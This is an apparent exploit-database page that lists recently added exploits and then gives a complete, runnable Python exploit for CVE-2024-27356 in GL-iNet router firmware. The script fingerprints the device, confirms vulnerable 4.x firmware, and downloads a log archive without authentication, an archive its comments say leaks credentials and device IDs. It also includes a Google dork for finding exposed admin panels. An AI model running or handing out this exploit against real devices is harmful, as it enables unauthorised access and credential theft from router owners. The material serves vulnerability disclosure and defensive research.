
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
79 lines
No EOL
3.2 KiB
Python
Executable file
79 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
|
|
# CVE: CVE-2024-27356
|
|
# Google Dork: intitle:"GL.iNet Admin Panel"
|
|
# Date: 2/26/2024
|
|
# Exploit Author: Bandar Alharbi (aggressor)
|
|
# Vendor Homepage: www.gl-inet.com
|
|
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
|
|
# Tested Model: GL-X3000 Spitz AX
|
|
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
|
|
|
|
import sys
|
|
import requests
|
|
import json
|
|
requests.packages.urllib3.disable_warnings()
|
|
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
|
|
|
|
def DoesTarExist():
|
|
r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
|
|
if r.status_code == 200:
|
|
f = open("logread.tar", "wb")
|
|
f.write(r.content)
|
|
f.close()
|
|
print("[*] Full logs archive `logread.tar` has been downloaded!")
|
|
print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
|
|
return True
|
|
else:
|
|
print("[*] The `logread.tar` archive does not exist however ... try again later!")
|
|
return False
|
|
|
|
def isVulnerable():
|
|
r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
|
|
if r1.status_code == 500 and "nginx" in r1.text:
|
|
r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
|
|
if "Admin-Token" in r2.text:
|
|
j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
|
|
r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
|
|
ver = r3.json()['result']['firmware_version']
|
|
model = r3.json()['result']['model']
|
|
if ver.startswith(('4.')):
|
|
print("[*] Firmware version (%s) is vulnerable!" %ver)
|
|
print("[*] Device model is: %s" %model)
|
|
return True
|
|
print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
|
|
return False
|
|
|
|
def isAlive():
|
|
try:
|
|
r = requests.get(url, verify=False, timeout=30, headers=h)
|
|
if r.status_code != 200:
|
|
print("[*] Make sure the target's web interface is accessible!")
|
|
return False
|
|
elif r.status_code == 200:
|
|
print("[*] The target is reachable!")
|
|
return True
|
|
except Exception:
|
|
print("[*] Error occurred when connecting to the target!")
|
|
pass
|
|
return False
|
|
|
|
if __name__ == '__main__':
|
|
if len(sys.argv) != 2:
|
|
print("exploit.py url")
|
|
sys.exit(0)
|
|
url = sys.argv[1]
|
|
url = url.lower()
|
|
if not url.startswith(('http://', 'https://')):
|
|
print("[*] Invalid url format! It should be http[s]://<domain or ip>")
|
|
sys.exit(0)
|
|
if url.endswith("/"):
|
|
url = url.rstrip("/")
|
|
|
|
print("[*] GL.iNet Unauthenticated Full Logs Downloader")
|
|
|
|
try:
|
|
if (isAlive() and isVulnerable()) == (True and True):
|
|
DoesTarExist()
|
|
except KeyboardInterrupt:
|
|
print("[*] The exploit has been stopped by the user!")
|
|
sys.exit(0) |